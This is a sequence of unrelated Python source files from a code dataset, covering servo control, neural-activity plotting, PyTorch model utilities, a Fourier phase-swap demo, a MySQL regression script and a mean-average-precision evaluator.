self.servoVertical.setAngle(angleVertical)
self.servoHorizontal.setAngle(angleHorizontal)
def setAngleHorizontal(self, angleHorizontal):
self.servoHorizontal.setAngle(angleHorizontal)
def setAngleVertical(self, angleVertical):
self.servoVertical.setAngle(angleVertical)
def addAngleVertical(self, angleVertical):
self.servoVertical.setAngle(angleVertical + self.servoVertical.getAngle())
def addAngleHorizontal(self, angleHorizontal):
self.servoHorizontal.setAngle(angleHorizontal + self.servoHorizontal.getAngle())
def draw(self, forme):
self.modeShape.turnOn()
self.shape.drawShape(forme)
self.modeShape.turnOff()
def turnOnLaser(self):
self.laser.turnOn()
def turnOffLaser(self):
self.laser.turnOff()
#t = Turret()
#t.draw("square")
| true |
9e4e8e75f63bc92bb1d975a25c3f5a31766a512e | Python | ejseal21/Computational-Neuroscience | /Project4/net_plots.py | UTF-8 | 7,441 | 3.59375 | 4 | [] | no_license | '''net_plots.py
Plots for visualization neural network activity
CS 443: Computational Neuroscience
Alice Cole Ethan
Project 4: Motion estimation
'''
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import display, clear_output
def plot_act_image_single(act, pause=0.001, cmap='bone'):
'''Shows a video of images of the neural activity `act` across time (i.e. the same image plot
updates to show a sequence of images that looks like a video)
Parameters:
-----------
act: ndarray. shape=(n_frames, height, width).
Activation values in a spatial image at different times. Could be the output of the neural
network or it could be a RDK to show/visualize.
pause: float.
How long to pause between drawing successive frames (i.e. controls frame rate)
cmap: str.
Matplotlib color scheme. 'bone' is a good choice for making 0 values black, 1 values white.
TODO:
- If `act` doesn't have a time dimension, add a leading singleton dimension.
- I'll sparse you the trouble of figuring out how to get the basic animation to work with
Jupyter notebook. Put the following figure creation code outside your main loop:
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
Then inside your loop, after all your plotting code, put:
display(fig)
clear_output(wait=True)
plt.pause(pause)
'''
if len(act.shape) == 2:
act = np.expand_dims(act, 0)
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
for n in range(act.shape[0]):
plt.imshow(act[n], cmap=cmap)
# display(fig)
clear_output(wait=True)
plt.pause(pause)
def plot_act_image_grid(act, n_rows=2, n_cols=4, pause=0.001, cmap='bone', figSz=(18, 9)):
'''Generate a grid of plots (generally 2x4 arrangement for 8 directions in 45 deg increments),
animated when there are more than 1 frame.
Parameters:
-----------
act: ndarray. shape=(n_frames, n_dirs, height, width).
Activation values in a spatial direction maps at different times.
Could be the output of the neural network or it could be kernels to visualize.
n_rows. int.
Number of rows in the grid plot to place plot panels.
n_cols. int.
Number of columns in the grid plot to place plot panels.
pause: float.
How long to pause between drawing successive frames (i.e. controls frame rate)
cmap: str.
Matplotlib color scheme. 'bone' is a good choice for making 0 values black, 1 values white.
figSz: tuple of ints.
(width, height) for the matplotlib figure size.
TODO:
- If `act` doesn't have a time dimension, add a leading singleton dimension.
- Check `n_dirs` and throw an error if it mismatches the number of rows/cols.
- To make an animated grid of plots, define your plt.figure outside the main loop.
- At each time, clear the figure (`fig.clf()`).
- In your deepest loop, create a new axis:
(`ax = fig.add_subplot(something, something, something)`).
- After your loops for rows/cols, put the following code:
display(fig)
clear_output(wait=True)
fig.tight_layout()
plt.pause(pause)
'''
if len(act.shape)==3:
act = np.expand_dims(act, axis=0)
(n_frames, n_dirs, height, width) = act.shape
if n_dirs != n_cols * n_rows:
print("Mismatch of n_dirs and n_rows/n_cols")
return
fig = plt.figure(figsize=figSz)
for n in range(act.shape[0]):
fig.clf()
for d in range(n_dirs):
ax = fig.add_subplot(n_rows, n_cols, d+1)
ax.imshow(act[n,d, :, :], cmap=cmap)
display(fig)
clear_output(wait=True)
fig.tight_layout()
plt.pause(pause)
def vector_sum_plot(act, figSz=(18, 9), pause=0.01):
'''Visualize the combined activity of all 8 direction cells as a single vector at every position
(sum of 8 vectors coming out of (x, y), where the 8 receptive fields are positioned).
Animates over time.
Goal: Use quiver to plot X, Y, U, and V at each time to visualize the direction cell activity
in a layer as a vector field.
- X is the x-coordinates of the cell receptive fields
- Y is the y-coordinates of the cell receptive fields
- U is the "u component" of the vector sum at each location (see equation in notebook)
- V is the "v component" of the vector sum at each location (see equation in notebook)
Parameters:
-----------
act: ndarray. shape=(n_frames, n_dirs, height, width).
Activation values in a spatial direction maps at different times.
Output of direction cells.
figSz: tuple of ints.
(width, height) for the matplotlib figure size.
pause: float.
How long to pause between drawing successive frames (i.e. controls frame rate)
TODO:
- If `act` doesn't have a time dimension, add a leading singleton dimension.
- Compute U and V for each time step.
- NOTE: You probably want to do this before the main animation loop due to the next
bullet point...
- Normalize U and V globally based on the max u/v component achieved across all time.
- Plot the vector field at each time step using quiver.
- NOTE: `np.meshgrid` is helpful for setting up the (x, y) coordinates for the vector that
quiver plots.
'''
if len(act.shape) == 3:
act = np.expand_dims(act, axis=0)
(n_frames, n_dirs, height, width) = act.shape
U = np.zeros((n_frames, height, width))
V = np.zeros((n_frames, height, width))
#compute U and V
for i in range (n_frames):
for j in range (height):
for k in range (width):
for m in range (n_dirs):
U[i, j, k] += act[i, m, j, k] * np.cos(2*np.pi*(m)/n_dirs)
V[i, j, k] += act[i, m, j, k] * np.sin(2*np.pi*(m)/n_dirs)
U = U/(np.max(U)+0.0000000000001)
V = V/(np.max(V)+0.0000000000001)
X = np.arange(0, width)
Y = np.arange(0, height)
X, Y = np.meshgrid(X, Y, indexing='xy')
fig = plt.figure(figsize=figSz)
ax = fig.add_subplot(1, 1, 1)
for n in range(n_frames):
plt.quiver(X, Y, U[n], V[n])
clear_output(wait=True)
plt.pause(pause)
def vector_sum_plot_and_input(act, input, figSz=(18, 9), pause=0.01):
input = np.where(input<1, 1, 0)
if len(act.shape) == 3:
act = np.expand_dims(act, axis=0)
(n_frames, n_dirs, height, width) = act.shape
U = np.zeros((n_frames, height, width))
V = np.zeros((n_frames, height, width))
#compute U and V
for i in range (n_frames):
for j in range (height):
for k in range (width):
for m in range (n_dirs):
U[i, j, k] += act[i, m, j, k] * np.cos(2*np.pi*(m)/n_dirs)
V[i, j, k] += act[i, m, j, k] * np.sin(2*np.pi*(m)/n_dirs)
U = U/(np.max(U)+0.0000000000001)
V = V/(np.max(V)+0.0000000000001)
X = np.arange(0, width)
Y = np.arange(0, height)
X, Y = np.meshgrid(X, Y, indexing='xy')
fig = plt.figure(figsize=figSz)
ax = fig.add_subplot(1, 1, 1)
for n in range(n_frames):
plt.quiver(X, Y, U[n], V[n])
plt.imshow(input[int(n/5)], cmap='bone')
clear_output(wait=True)
plt.pause(pause) | true |
6d64467d1b1a80528707af7edd9ee5b136cc2e2b | Python | AdamZhouSE/pythonHomework | /Code/CodeRecords/2535/60773/292953.py | UTF-8 | 919 | 2.640625 | 3 | [] | no_license | s=input()
#print(s)
s=s[1:len(s)-1]
l=s.split(",")
for i in range(len(l)):
l[i]=int(l[i])
list=[]
point=[]
sum=0
'''for i in range(len(l)):
squart=[]
n=l[i]
for j in range(len(list)):
m=max(list[j])
if n<m:
for k in range(j+1,len(list),1):
list[j]=list[j]+list[k]
sum=j
break
print(sum)
print(list)
list[sum].append(n)
sum=sum+1
print(sum)'''
sum=1
point.append(0)
for i in range(1,len(l),1):
flag=0
for j in range(len(point)):
if j==len(point)-1:
squart=l[point[len(point)-1]:i]
else:
squart=l[point[j]:point[j+1]]
if l[i]<max(squart):
flag=1
point=point[:j+1]
break
if flag==0:
sum=sum+1
point.append(l[i])
print(len(point))
| true |
5975fb60c979d86459a91f4c2e2b418b271f25c1 | Python | godjuansan/FakeNewsGenerator | /model/graphs_neuron_network.py | UTF-8 | 549 | 3.015625 | 3 | [] | no_license | import matplotlib.pyplot as plt
# graph of neural network model of both loss and accuracy
def graphs_nn(loss, val_loss, accuracy, val_accuracy):
epochs = range(1, len(loss) + 1)
plt.figure(1)
plt.plot(epochs, loss, label='train')
plt.plot(epochs, val_loss, label='test')
plt.ylabel("Loss")
plt.xlabel("Epoch")
plt.legend()
plt.figure(2)
plt.plot(epochs, accuracy, label='train')
plt.plot(epochs, val_accuracy, label='test')
plt.ylabel("Accuracy")
plt.xlabel("Epoch")
plt.legend()
plt.show() | true |
ce7dbfdb9f2a9b71fc51a696436e3cddd3d857f4 | Python | ghanshyamdhiman/gsdflk | /include/filesstore.py | UTF-8 | 408 | 3.140625 | 3 | [] | no_license | from webscrapper import LyricsScrapper
the_url = "http://www.values.com/inspirational-quotes"
the_scrapper = LyricsScrapper(the_url)
the_lyrics_data = the_scrapper.get_lyrics()
def store_the_file(file_name, lyrics_data):
try:
f = open(file_name, "a")
f.write(lyrics_data)
finally:
f.close()
the_file_name = "test_file.txt"
store_the_file(the_file_name, the_lyrics_data)
| true |
cc8b69132186b3fc808a258e3dc727d3e64ffe65 | Python | TheBlusky/tromino | /src/models/parameter.py | UTF-8 | 1,295 | 2.578125 | 3 | [] | no_license | from exceptions import ParameterAlreadyExists
from models.database import Database
class ParameterModel:
@classmethod
async def create(cls, param_name, value):
collection = Database.get_collection("config")
document = await collection.find_one({"param_name": param_name})
if document is not None:
raise ParameterAlreadyExists()
document_data = {"param_name": param_name, "value": value}
await collection.insert_one(document_data)
return ParameterModel(document_data)
@classmethod
async def retrieve(cls, param_name):
collection = Database.get_collection("config")
document = await collection.find_one({"param_name": param_name})
return document and ParameterModel(document)
def __init__(self, document):
self.param_name = document["param_name"]
self.value = document["value"]
async def change_value(self, new_value):
collection = Database.get_collection("config")
await collection.update_one(
{"param_name": self.param_name}, {"$set": {"value": new_value}}
)
self.value = new_value
@classmethod
async def flush(cls):
collection = Database.get_collection("config")
await collection.delete_many({})
| true |
1afe372e4966458b39341c7bc353c346ae354e63 | Python | geekswaroop/pytorch_connectomics | /connectomics/model/utils/misc.py | UTF-8 | 10,484 | 2.734375 | 3 | [
"MIT"
] | permissive | from __future__ import print_function, division
from collections import OrderedDict
from typing import Optional, List
import torch
from torch import nn
import torch.nn.functional as F
from torch.jit.annotations import Dict
class IntermediateLayerGetter(nn.ModuleDict):
"""
Module wrapper that returns intermediate layers from a model, adapted
from https://github.com/pytorch/vision/blob/master/torchvision/models/_utils.py.
It has a strong assumption that the modules have been registered
into the model in the same order as they are used.
This means that one should **not** reuse the same nn.Module
twice in the forward if you want this to work.
Additionally, it is only able to query submodules that are directly
assigned to the model. So if `model` is passed, `model.feature1` can
be returned, but not `model.feature1.layer2`.
Arguments:
model (nn.Module): model on which we will extract the features
return_layers (Dict[name, new_name]): a dict containing the names
of the modules for which the activations will be returned as
the key of the dict, and the value of the dict is the name
of the returned activation (which the user can specify).
Examples::
>>> m = torchvision.models.resnet18(pretrained=True)
>>> # extract layer1 and layer3, giving as names `feat1` and feat2`
>>> new_m = torchvision.models._utils.IntermediateLayerGetter(m,
>>> {'layer1': 'feat1', 'layer3': 'feat2'})
>>> out = new_m(torch.rand(1, 3, 224, 224))
>>> print([(k, v.shape) for k, v in out.items()])
>>> [('feat1', torch.Size([1, 64, 56, 56])),
>>> ('feat2', torch.Size([1, 256, 14, 14]))]
"""
_version = 2
__annotations__ = {
"return_layers": Dict[str, str],
}
def __init__(self, model, return_layers):
if not set(return_layers).issubset([name for name, _ in model.named_children()]):
raise ValueError("return_layers are not present in model")
orig_return_layers = return_layers
return_layers = {str(k): str(v) for k, v in return_layers.items()}
layers = OrderedDict()
for name, module in model.named_children():
layers[name] = module
if name in return_layers:
del return_layers[name]
if not return_layers:
break
super(IntermediateLayerGetter, self).__init__(layers)
self.return_layers = orig_return_layers
def forward(self, x):
out = OrderedDict()
for name, module in self.items():
x = module(x)
if name in self.return_layers:
out_name = self.return_layers[name]
out[out_name] = x
return out
class SplitActivation(object):
r"""Apply different activation functions for the outpur tensor.
"""
# number of channels of different target options
num_channels_dict = {
'0': 1,
'1': 3,
'2': 3,
'3': 1,
'4': 1,
'5': 11,
'6': 1,
}
def __init__(self,
target_opt: List[str] = ['0'],
output_act: Optional[List[str]] = None,
split_only: bool = False,
do_cat: bool = True,
do_2d: bool = False,
normalize: bool = False):
if output_act is not None:
assert len(target_opt) == len(output_act)
if do_2d:
self.num_channels_dict['2'] = 2
self.split_channels = []
self.target_opt = target_opt
self.do_cat = do_cat
self.normalize = normalize
for topt in self.target_opt:
if topt[0] == '9':
channels = int(topt.split('-')[1])
self.split_channels.append(channels)
else:
self.split_channels.append(
self.num_channels_dict[topt[0]])
self.split_only = split_only
if not self.split_only:
self.act = self._get_act(output_act)
def __call__(self, x):
x = torch.split(x, self.split_channels, dim=1)
x = list(x) # torch.split returns a tuple
if self.split_only:
return x
x = [self._apply_act(self.act[i], x[i])
for i in range(len(x))]
if self.do_cat:
return torch.cat(x, dim=1)
return x
def _get_act(self, act):
num_target = len(self.target_opt)
out = [None]*num_target
for i, act in enumerate(act):
out[i] = get_functional_act(act)
return out
def _apply_act(self, act_fn, x):
x = act_fn(x)
if self.normalize and act_fn == torch.tanh:
x = (x + 1.0) / 2.0
return x
@classmethod
def build_from_cfg(cls,
cfg,
do_cat: bool = True,
split_only: bool = False,
normalize: bool = False):
return cls(cfg.MODEL.TARGET_OPT,
cfg.INFERENCE.OUTPUT_ACT,
split_only=split_only,
do_cat=do_cat,
do_2d=cfg.DATASET.DO_2D,
normalize=normalize)
# ------------------
# Swish Activation
# ------------------
# An ordinary implementation of Swish function
class Swish(nn.Module):
def forward(self, x):
return x * torch.sigmoid(x)
# A memory-efficient implementation of Swish function
class SwishImplementation(torch.autograd.Function):
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
i = ctx.saved_variables[0]
sigmoid_i = torch.sigmoid(i)
return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class MemoryEfficientSwish(nn.Module):
def forward(self, x):
return SwishImplementation.apply(x)
# --------------------
# Activation Layers
# --------------------
def get_activation(activation: str = 'relu') -> nn.Module:
"""Get the specified activation layer.
Args:
activation (str): one of ``'relu'``, ``'leaky_relu'``, ``'elu'``, ``'gelu'``,
``'swish'``, 'efficient_swish'`` and ``'none'``. Default: ``'relu'``
"""
assert activation in ["relu", "leaky_relu", "elu", "gelu",
"swish", "efficient_swish", "none"], \
"Get unknown activation key {}".format(activation)
activation_dict = {
"relu": nn.ReLU(inplace=True),
"leaky_relu": nn.LeakyReLU(negative_slope=0.2, inplace=True),
"elu": nn.ELU(alpha=1.0, inplace=True),
"gelu": nn.GELU(),
"swish": Swish(),
"efficient_swish": MemoryEfficientSwish(),
"none": nn.Identity(),
}
return activation_dict[activation]
def get_functional_act(activation: str = 'relu'):
"""Get the specified activation function.
Args:
activation (str): one of ``'relu'``, ``'tanh'``, ``'elu'``, ``'sigmoid'``,
``'softmax'`` and ``'none'``. Default: ``'sigmoid'``
"""
assert activation in ["relu", "tanh", "elu", "sigmoid", "softmax", "none"], \
"Get unknown activation_fn key {}".format(activation)
activation_dict = {
'relu': F.relu_,
'tanh': torch.tanh,
'elu': F.elu_,
'sigmoid': torch.sigmoid,
'softmax': lambda x: F.softmax(x, dim=1),
'none': lambda x: x,
}
return activation_dict[activation]
# ----------------------
# Normalization Layers
# ----------------------
def get_norm_3d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
"""Get the specified normalization layer for a 3D model.
Args:
norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
out_channels (int): channel number.
bn_momentum (float): the momentum of normalization layers.
Returns:
nn.Module: the normalization layer
"""
assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
"Get unknown normalization layer key {}".format(norm)
norm = {
"bn": nn.BatchNorm3d,
"sync_bn": nn.BatchNorm3d,
"in": nn.InstanceNorm3d,
"gn": lambda channels: nn.GroupNorm(8, channels),
"none": nn.Identity,
}[norm]
if norm in ["bn", "sync_bn", "in"]:
return norm(out_channels, momentum=bn_momentum)
else:
return norm(out_channels)
def get_norm_2d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
"""Get the specified normalization layer for a 2D model.
Args:
norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
out_channels (int): channel number.
bn_momentum (float): the momentum of normalization layers.
Returns:
nn.Module: the normalization layer
"""
assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
"Get unknown normalization layer key {}".format(norm)
norm = {
"bn": nn.BatchNorm2d,
"sync_bn": nn.BatchNorm2d,
"in": nn.InstanceNorm2d,
"gn": lambda channels: nn.GroupNorm(16, channels),
"none": nn.Identity,
}[norm]
if norm in ["bn", "sync_bn", "in"]:
return norm(out_channels, momentum=bn_momentum)
else:
return norm(out_channels)
def get_norm_1d(norm: str, out_channels: int, bn_momentum: float = 0.1) -> nn.Module:
"""Get the specified normalization layer for a 1D model.
Args:
norm (str): one of ``'bn'``, ``'sync_bn'`` ``'in'``, ``'gn'`` or ``'none'``.
out_channels (int): channel number.
bn_momentum (float): the momentum of normalization layers.
Returns:
nn.Module: the normalization layer
"""
assert norm in ["bn", "sync_bn", "gn", "in", "none"], \
"Get unknown normalization layer key {}".format(norm)
norm = {
"bn": nn.BatchNorm1d,
"sync_bn": nn.BatchNorm1d,
"in": nn.InstanceNorm1d,
"gn": lambda channels: nn.GroupNorm(16, channels),
"none": nn.Identity,
}[norm]
if norm in ["bn", "sync_bn", "in"]:
return norm(out_channels, momentum=bn_momentum)
else:
return norm(out_channels)
def get_num_params(model):
num_param = sum([param.nelement() for param in model.parameters()])
return num_param
| true |
64a08de816cd8aee32b0b9ff9a0fb7c774a3b711 | Python | teemo927/python_ba | /wuhan_house_price/HttpDownloader.py | UTF-8 | 1,402 | 2.875 | 3 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import urllib.parse
import urllib.request
from urllib.error import URLError
from Proxy_Get import Proxy_Get
class HttpDownloader(object):
def download(self, url):
if url is None:
return None
print(url)
p = Proxy_Get()
res = p.proxy_url(url)
print(res)
return res
def load_imgs(self, title, img_urls):
if img_urls is None:
return None
for index in range(len(img_urls)):
img_url = img_urls[index]
path = self._get_path(index, title, img_url)
self._load_img(img_url, path, index)
def _get_path(self, url, title, index):
try:
base = os.getcwd() + "\\py_downloads\\" + title + "\\"
if os.path.exists(base) is False:
os.makedirs(base)
link = str(url)
name = link.split('/')
path = base + str(index) + "_" + name[-1]
if path.__contains__('&'):
path = str(path).split('&')[-1]
return path
except Exception as e:
print(e)
def _load_img(self, img_url, path, index):
try:
urllib.request.urlretrieve(img_url, path)
print(index, '、', img_url)
print(index, '、', path)
except URLError as e:
print(e)
| true |
4e8062049cc23b5c14d3e9b91ff6bb64db231491 | Python | ferakon/2D_Fourier_Phase_Swap | /phase_swap_2D.py | UTF-8 | 1,074 | 3.046875 | 3 | [
"Apache-2.0"
] | permissive | #import packages
import numpy as np
import matplotlib.pyplot as plt
#read single channel images
img_1 = plt.imread("cameraman.tif")
img_2 = plt.imread("cameraman_flip.tif")
#apply 2D Fourier transform
ft_1 = np.fft.fft2(img_1)
ft_2 = np.fft.fft2(img_2)
#swap image phase responses
out_1 = np.abs(ft_1) * np.exp(np.dot(1j,np.angle(ft_2)));
out_2 = np.abs(ft_2) * np.exp(np.dot(1j,np.angle(ft_1)));
#perform inverse 2D Fourier transform and take the real part
out_1 = np.real(np.fft.ifft2(out_1))
out_2 = np.real(np.fft.ifft2(out_2))
#create a figure and plot the comparative images
plt.figure(1)
plt.subplot(221)
plt.axis('off')
plt.title('Original image #1')
plt.imshow(img_1, cmap='gray')
plt.subplot(222)
plt.axis('off')
plt.title('Magnitude of #1, phase of #2')
plt.imshow(out_1, cmap='gray')
plt.subplot(223)
plt.axis('off')
plt.title('Original image #2')
plt.imshow(img_2, cmap='gray')
plt.subplot(224)
plt.axis('off')
plt.title('Magnitude of #2, phase of #1')
plt.imshow(out_2, cmap='gray')
plt.show()
| true |
771477839905adfbcdbb2c23540fc530bf29115b | Python | santoshbegur/kigyan | /SpringBootCpgApp/src/main/resources/static/assets/LinearRegression.py | UTF-8 | 3,578 | 2.625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 20 16:19:14 2019
@author: Santosh
"""
from pandas import read_csv
from pandas import DataFrame,datetime
from matplotlib import pyplot
from statsmodels.tsa.arima_model import ARIMA
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
import mysql.connector
import pandas as pa
from mysql.connector import Error
import numpy as np
try:
# Connect to MySQL database
connection = mysql.connector.connect(host='localhost',
database='upcdatamodel',
user='root',
password='admin@kigyan')
if connection.is_connected():
cursor=connection.cursor()
sql_select_Query = "select distinct store_id from transaction_summary where store_id in (1,2,3,4)"
cursor.execute(sql_select_Query)
records = cursor.fetchall()
for row in records:
store = row[0]
print("store:",store)
sql_select_Query1 = "select distinct l3_id from transaction_summary where l3_id in (100037,100038,100003,100104)"
cursor.execute(sql_select_Query1)
records1 = cursor.fetchall()
for row in records1:
prod = row[0]
print ("Product:" ,prod)
sql_select_Query2 = "select s_week_id, sum(qty) from transaction_summary where store_id = %s and l3_id = %s group by s_week_id "
cursor.execute(sql_select_Query2,(store,prod))
records2 = cursor.fetchall()
df = DataFrame(records2)
#print (df.shape)
#df.head()
X = df[0].values
Y = df[1].values
m = len(X)
#mean_x = np.mean(X)
mean_x = 36
mean_y = np.mean(Y)
print("x :" ,mean_x, "Y:" ,mean_y)
numer = 0
denom = 0
for i in range(m):
numer += (X[i] - mean_x) * (Y[i] - mean_y)
denom += (X[i] - mean_x) ** 2
b1 = numer / denom
b0 = mean_y - (b1 * mean_x)
print(b1,b0)
n = 158
for j in range(n):
y_pred = b0 + b1 * j
#rmse += (Y[j] - y_pred) ** 2
#rmse = np.sqrt(rmse/m)
try:
sql_select_Query_final = """ INSERT INTO `prediction`(`s_week_id`, `Week_id`, `store_id`, `l3_id`,`qty`) VALUES (%s,%s,%s,%s,%s)"""
sql_update_s_week_id = """ update prediction p inner join week_master w set p.week_id=w.week_id where p.s_week_id=w.s_id"""
insert_tuple = (j+1,i,store,prod,y_pred)
result = cursor.execute(sql_select_Query_final, insert_tuple)
update = cursor.execute(sql_update_s_week_id)
connection.commit()
print ("Record inserted successfully: ",insert_tuple)
except mysql.connector.Error as error:
connection.rollback()
print("Failed to insert into MySQL table {}".format(error))
except Error as e :
print ("Error while connecting to MySQL", e)
finally:
#closing database connection.
if(connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed") | true |
8631c9a594aca9e49d70b4ad1b62caeee9eed2ff | Python | BruceDai003/tools | /cann-benchmark_infer_scripts/scripts/map_calculate.py | UTF-8 | 13,946 | 3.25 | 3 | [
"Apache-2.0"
] | permissive | """
Copyright 2020 Huawei Technologies Co., Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Typical usage example:
"""
import glob
import os
import sys
import argparse
import collections
"""
0,0 ------> x (width)
|
| (Left,Top)
| *_________
| | |
| |
y |_________|
(height) *
(Right,Bottom)
"""
MINOVERLAP = 0.5 # default value (defined in the PASCAL VOC2012 challenge)
top_margin = 0.15 # in percentage of the figure height
bottom_margin = 0.05 # in percentage of the figure height
def file_lines_to_list(path):
"""
Convert the lines of a file to a list
"""
# open txt file lines to a list
with open(path) as f:
content = f.readlines()
# remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
return content
def voc_ap(recall, precision):
"""
Calculate the AP given the recall and precision array
1) We calculate a version of the measured
precision/recall curve with precision monotonically decreasing
2) We calculate the AP as the area
under this curve by numerical integration.
"""
"""
--- Official matlab code VOC2012---
m_recall=[0 ; recall ; 1];
m_precision=[0 ; precision ; 0];
for j=numel(m_precision)-1:-1:1
m_precision(i)=max(m_precision(j),m_precision(j+1));
end
i=find(m_recall(2:end)~=m_recall(1:end-1))+1;
ap=sum((m_recall(i)-m_recall(i-1)).*m_precision(i));
"""
recall.insert(0, 0.0) # insert 0.0 at beginning of list
recall.append(1.0) # insert 1.0 at end of list
m_recall = recall[:]
precision.insert(0, 0.0) # insert 0.0 at beginning of list
precision.append(0.0) # insert 0.0 at end of list
m_precision = precision[:]
"""
This part makes the precision monotonically decreasing
(goes from the end to the beginning)
matlab: for i=numel(m_precision)-1:-1:1
m_precision(i)=max(m_precision(i),m_precision(i+1));
"""
for i in range(len(m_precision) - 2, -1, -1):
m_precision[i] = max(m_precision[i], m_precision[i + 1])
"""
This part creates a list of indexes where the recall changes
matlab: i=find(m_recall(2:end)~=m_recall(1:end-1))+1;
"""
i_list = []
for i in range(1, len(m_recall)):
if m_recall[i] != m_recall[i - 1]:
i_list.append(i) # if it was matlab would be i + 1
"""
The Average Precision (AP) is the area under the curve
(numerical integration)
matlab: ap=sum((m_recall(i)-m_recall(i-1)).*m_precision(i));
"""
ap = 0.0
for i in i_list:
ap += ((m_recall[i] - m_recall[i - 1]) * m_precision[i])
return ap, m_recall, m_precision
def is_float_between_0_and_1(value):
"""
check if the number is a float between 0.0 and 1.0
"""
try:
val = float(value)
if val > 0.0 and val < 1.0:
return True
else:
return False
except ValueError:
return False
def error(msg):
"""
throw error and exit
"""
print(msg)
sys.exit(0)
def check_args(args):
"""
check arguments
"""
if not (os.path.exists(args.label_path)):
error("annotation file:{} does not exist.".format(args.label_path))
if not (os.path.exists(args.npu_txt_path)):
error("txt path:{} does not exist.".format(args.npu_txt_path))
if args.ignore is None:
args.ignore = []
return args
def parse_line(txt_file, lines_list, bounding_boxes, counter_per_class, already_seen_classes):
""" parse line
:param txt_file:
:param lines_list:
:param bounding_boxes:
:param counter_per_class:
:param already_seen_classes:
:return: bounding_boxes, counter_per_class
"""
for line in lines_list:
try:
class_name, left, top, right, bottom = line.split()
except ValueError:
error_msg = "Error: File " + txt_file + " in the wrong format.\n"
error_msg += " Expected: <class_name> <l> <t> <r> <b>\n"
error_msg += " Received: " + line
error(error_msg)
if class_name in args.ignore:
continue
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"class_name": class_name, "bbox": bbox, "used": False})
counter_per_class[class_name] += 1
if class_name not in already_seen_classes:
already_seen_classes.append(class_name)
return bounding_boxes, counter_per_class
def get_label_list(file_path):
""" get label list via file paths
:param file_path: label file path
:return: ret
map , include file_bbox, classes, n_classes, counter_per_class
"""
files_list = glob.glob(file_path + '/*.txt')
if len(files_list) == 0:
error("Error: No ground-truth files found!")
files_list.sort()
# dictionary with counter per class
counter_per_class = collections.defaultdict(int)
file_bbox = {}
for txt_file in files_list:
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
# check if there is a correspondent detection-results file
temp_path = os.path.join(file_path, (file_id + ".txt"))
if not os.path.exists(temp_path):
error_msg = "Error. File not found: {}\n".format(temp_path)
error(error_msg)
lines_list = file_lines_to_list(txt_file)
# create ground-truth dictionary
bounding_boxes = []
already_seen_classes = []
boxes, counter_per_class = parse_line(txt_file, lines_list, bounding_boxes, counter_per_class,
already_seen_classes)
file_bbox[file_id] = boxes
classes = list(counter_per_class.keys())
# let's sort the classes alphabetically
classes = sorted(classes)
n_classes = len(classes)
ret = dict()
ret['file_bbox'] = file_bbox
ret['classes'] = classes
ret['n_classes'] = n_classes
ret['counter_per_class'] = counter_per_class
return ret
def get_predict_list(file_path, gt_classes):
""" get predict list with file paths and class names
:param file_path: predict txt file path
:param gt_classes: class information
:return: class_bbox bbox of every class
"""
dr_files_list = glob.glob(file_path + '/*.txt')
dr_files_list.sort()
class_bbox = {}
for class_index, class_name in enumerate(gt_classes):
bounding_boxes = []
for txt_file in dr_files_list:
# the first time it checks
# if all the corresponding ground-truth files exist
file_id = txt_file.split(".txt", 1)[0]
file_id = os.path.basename(os.path.normpath(file_id))
lines = file_lines_to_list(txt_file)
for line in lines:
try:
sl = line.split()
tmp_class_name, confidence, left, top, right, bottom = sl
if float(confidence) < float(args.threshold):
continue
except ValueError:
error_msg = "Error: File " + txt_file + " wrong format.\n"
error_msg += " Expected: <classname> <conf> <l> <t> <r> <b>\n"
error_msg += " Received: " + line
error(error_msg)
if tmp_class_name == class_name:
bbox = left + " " + top + " " + right + " " + bottom
bounding_boxes.append({"confidence": confidence, "file_id": file_id, "bbox": bbox})
# sort detection-results by decreasing confidence
bounding_boxes.sort(key=lambda x: float(x['confidence']), reverse=True)
class_bbox[class_name] = bounding_boxes
return class_bbox
def calculate_PR(sum_AP, fp, tp, counter_per_class, class_name):
"""
@description: calculate PR
@param sum_AP
@param fp
@param tp
@param counter_per_class
@param class_name
@return ret
map, include sum_AP, text, prec, rec
"""
cumsum = 0
for idx, val in enumerate(fp):
fp[idx] += cumsum
cumsum += val
cumsum = 0
for idx, val in enumerate(tp):
tp[idx] += cumsum
cumsum += val
rec = tp[:]
for idx, val in enumerate(tp):
rec[idx] = float(tp[idx]) / counter_per_class[class_name]
prec = tp[:]
for idx, val in enumerate(tp):
prec[idx] = float(tp[idx]) / (fp[idx] + tp[idx])
ap, mrec, mprec = voc_ap(rec[:], prec[:])
sum_AP += ap
# class_name + " AP = {0:.2f}%".format(ap * 100)
text = "{0:.2f}%".format(ap * 100) + " = " + class_name + " AP "
ret = dict()
ret['sum_AP'] = sum_AP
ret['text'] = text
ret['prec'] = prec
ret['rec'] = rec
return ret
def calculate_AP(output_file, gt_classes, labels, class_bbox, counter_per_class):
"""
Calculate the AP for each class
:param output_file:
:param gt_classes: [80]
:param labels: {file_index:[{"class_name": class_name, "bbox": bbox, "used": False}]}
:param class_bbox: {class_name:[{"confidence": confidence,
"file_id": file_id, "bbox": bbox}]}
:return:
"""
